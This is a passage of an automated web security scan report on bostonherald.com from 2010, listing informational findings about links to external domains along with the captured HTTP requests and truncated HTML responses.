http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:10:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 101122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe style="position: relative; margin-bottom: 14px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294810"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101107/f448d0_mbta_11082010.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.18. http://bostonherald.com/news/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/columnists/?srvc=news&position=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/columnists/
http://multimedia.heraldinteractive.com/images/20101101/stp/819f2e_pulse_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/a65e30_Chuck_10282010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/b38e42_frank_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/27095a_ltpPatrickA110310.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/460667_Barney_11032010.JPG
http://multimedia.heraldinteractive.com/images/20101103/stp/758b30_cahill_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/ee6522_frank_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/13724a_Turn_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/856fdd_baker_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/a073c5_vets_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/columnists/?srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:23:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Columnists - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/columnists/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries </a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/856fdd_baker_11072010.jpg" alt="DECISION DAY: Gubernatorial candidate Charlie Baker hugs state Sen. Richard Tisei on election night as Baker’s wife  Lauren looks on at the House of Blues. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a href="/news/columnists/view/20101107gops_blue-chippers_emerge_amid_losses/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg" alt="James Fagan of Taunton."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20101107puerto_rican_vets_seek_honor/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/a073c5_vets_11072010.jpg" alt="SACRED VISION: Vietnam veterans Jaime Rodriguez and Tony Molina hope to  expand a 65th Regiment memorial in the South End to one honoring all soldiers from Puerto Rico."></a>
...[SNIP]...
<a href="/news/columnists/view/20101105friend_advises_chuck_turner_keep_your_mouth_shut/"><img src="http://multimedia.heraldinteractive.com/images/20101104/stp/13724a_Turn_11062010.jpg" alt="TURNER FALLS: City Councilor Chuck Turner was convicted last week, but has continued his attacks on the federal government even as his friends try to gain a lenient sentence for him."></a>
...[SNIP]...
<a href="/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt="Patriots running back Danny Woodhead gets hit in the face while being tackled by San Diego Chargers Stephen Cooper during the first quarter of an NFL football game Sunday, Oct. 24, 2010, in San Diego. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=col&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif" alt="Poll"><a href="/news/columnists/view/20101105danny_woodheads_tops_on_the_short_list_of_gridiron_hunks/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20101104hey_tim_cahill_thanks_so_much_love_deval_patrick/"><img src="http://multimedia.heraldinteractive.com/images/20101103/stp/758b30_cahill_11042010.jpg" alt=" Tim Cahill"></a>
...[SNIP]...
<a href="/news/columnists/view/20101104sorry_barney_frank_but_you_cant_be_trusted/"><img src="http://multimedia.heraldinteractive.com/images/20101103/stp/ee6522_frank_11042010.jpg" alt="ALL THE RAGE: U.S. Rep. Barney Frank addresses supporters at the Crown Royal Hotel in Newton after his victory Tuesday in the 4th Congressional District."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20101104sorry_barney_frank_but_you_cant_be_trusted/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20101103barney_franks_irrelevance/"><img src="http://multimedia.heraldinteractive.com/images/20101103/stp/460667_Barney_11032010.JPG" alt="
IN THE HOUSE: U.S. Rep. Barney Frank speaks to his supporters at the Crown Royal Hotel in Newton after defeating Republican challenger Sean Bielat yesterday."></a>
...[SNIP]...
<a href="/news/columnists/view/20101103congratulations_gov_deval_patrick_but_now_comes_hard_part/"><img src="http://multimedia.heraldinteractive.com/images/20101103/stp/27095a_ltpPatrickA110310.jpg" alt="Governor Deval Patrick gives a thumbs up to his wife Diane after voting at St. Mary of the Hills School Tuesday, November 2, 2010."></a>
...[SNIP]...
<a href="/news/columnists/view/20101103one_last_vote__get_rid_of_chuck_turner/"><img src="http://multimedia.heraldinteractive.com/images/20101102/stp/a65e30_Chuck_10282010.jpg" alt="Chuck Turner"></a>
...[SNIP]...
<a href="/news/columnists/view/20101102barney_franks_brookline_stronghold_flirts_with_sean_bielat/"><img src="http://multimedia.heraldinteractive.com/images/20101102/stp/b38e42_frank_11022010.jpg" alt="U.S. Rep. Barney Frank talks to seniors at Boylston Place in Chestnut Hill."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20101102barney_franks_brookline_stronghold_flirts_with_sean_bielat/srvc=col&position=">
...[SNIP]...
<a href="/news/columnists/view/20101102dangers_of_abuse_sobering/"><img src="http://multimedia.heraldinteractive.com/images/20101101/stp/819f2e_pulse_11022010.jpg" alt="Text by Christine McConville. Staff graphic.*All Death Statistics Latest Available From 2008."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/news/columnists/view/20101102dangers_of_abuse_sobering/srvc=col&position=">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1294586"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/6fb9d3_limo_11072010.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1294589"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/fb307e_110610cahillfn03.JPG" alt="Local Politics" /></a>
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.19. http://bostonherald.com/news/columnists/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/columnists/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/columnists/view.bg?articleid=1294590&srvc=news&position=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/columnists/
http://gallery.pictopia.com/bostonherald/gallery/news/2010%20Mass.%20election
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/856fdd_baker_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg
http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/columnists/view.bg?articleid=1294590&srvc=news&position=3 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:28:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1294590&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'GOP’s blue-chippers emerge amid losses');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294590&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(144) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
lick to open photo gallery: 2010 Mass. election" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/856fdd_baker_11072010.jpg" alt="DECISION DAY: Gubernatorial candidate..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4514','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/25c56a_110210cahilltf07.jpg" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/news\\2010 Mass. election"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/news\\2010 Mass. election">Purchase Herald Photos</a>
...[SNIP]...
<a href="/news/us_politics/view/20101107gops_mike_pence_to_decide_on_2012_bid_after_new_year/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/25bec3_pence.jpg" alt="GOP’s Mike Pence to decide on 2012 bid after new year" /></a>
...[SNIP]...
<a href="/news/us_politics/view/20101107obama_says_midcourse_corrections_to_come_at_home/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/64a019_obam.jpg" alt="Obama says ‘midcourse corrections’ to come at home" /></a>
...[SNIP]...
<a href="/news/columnists/view/20101107shaunna_oconnell_used_state_reps_own_words_in_defeating_him_justice_prevails_1/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/0ecd46_eagan_11072010.jpg" alt="Shaunna O’Connell used state rep’s own words in defeating him" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
